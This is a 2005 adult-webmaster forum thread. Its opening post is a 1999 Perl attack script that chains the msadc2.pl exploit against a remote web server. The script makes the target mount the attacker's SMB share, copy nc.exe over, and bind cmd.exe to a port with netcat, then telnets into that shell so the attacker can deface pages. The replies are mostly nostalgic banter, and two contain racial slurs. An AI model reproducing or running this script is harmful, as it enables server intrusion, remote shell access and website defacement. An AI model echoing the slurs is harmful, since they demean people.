GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   ahh history (https://gfy.com/showthread.php?t=422644)

ytcracker 01-26-2005 03:59 PM

ahh history
 
#!/usr/bin/perl
# [msadc2.pl GFX spin perl script]
# by ytcracker/[email protected]
#
# [being description]
# for all the script kiddiez out there who want gfx on their
# hax0red pages in win 9x/NT. msadc oenz you in the 9d9.
# requires msadc2.pl.
# [end description]
#
# [begin usage]
# first off, you need to enable sharing on your win 9x/NT box.
# select a folder and copy your html and graphics into it.
# share the folder with the name "share". mount it read only.
# copy nc.exe into the shared folder.
#
# perl gfxspin.pl [remote host] [local ip] [cmd port]
# i.e. perl gfxspin.pl www.felons.org 132.7.34.223 8500
#
# opens a command shell on port 8500, sharing the drive as y:
# on the remote system. you may need to turn on local echo for
# windows telnet if you haven't already.
#
# IMPORTANT: be sure that at the end of your session you type
# "net use y: /DELETE /YES" to unmount the share from the target box.
# [end usage]


if (!($ARGV[0])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl [remote host] [local ip] [cmd port]\n";
exit;
}

if (!($ARGV[1])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl $ARGV[0] [local ip] [cmd port]\n";
exit;
}

if (!($ARGV[2])) {
print "[gfxspin by ytcracker]\n";
print "usage: gfxspin.pl $ARGV[0] $ARGV[1] [cmd port]\n";
exit;
}

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "net use y: \\\\$ARGV[1]\\share /YES\n";
close TRGET;

sleep 5;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "copy y:\\nc.exe \n";
close TRGET;

sleep 20;

open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
print TRGET "nc -l -p $ARGV[2] -e cmd.exe\n";
close TRGET;

system("telnet $ARGV[0] $ARGV[2]");

#EOF [ytcracker labs 1999]

BlueQuartz 01-26-2005 04:56 PM

:error :error :error

Nismo 01-26-2005 05:01 PM

msadc2.pl & unicode.pl ... ahhh. :/

brand0n 01-26-2005 05:04 PM

10 print "i am elite"
20 goto 10

flashfire 01-26-2005 05:05 PM

glad I dont have to code like that anymore

pxxx 01-26-2005 05:08 PM

That look like it is hard to understand.

Hairetsu 01-26-2005 05:19 PM

:-0 sups nigra

Screaming 01-26-2005 05:39 PM

Felons.org? whats that?

nofx 01-26-2005 05:41 PM

yer such a digital gangster ;]

Hairetsu 01-26-2005 05:53 PM

nofx is the niggra of the hax0r n4710n

See Cig 01-26-2005 07:10 PM

dunno wtf any of that shit means

Pornopat 01-26-2005 07:27 PM

Quote:

Originally Posted by brand0n
10 print "i am elite"
20 goto 10

Basic....those were the days on my msx 1....

wargames 01-26-2005 08:39 PM

Get your point.


All times are GMT -7. The time now is 12:44 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123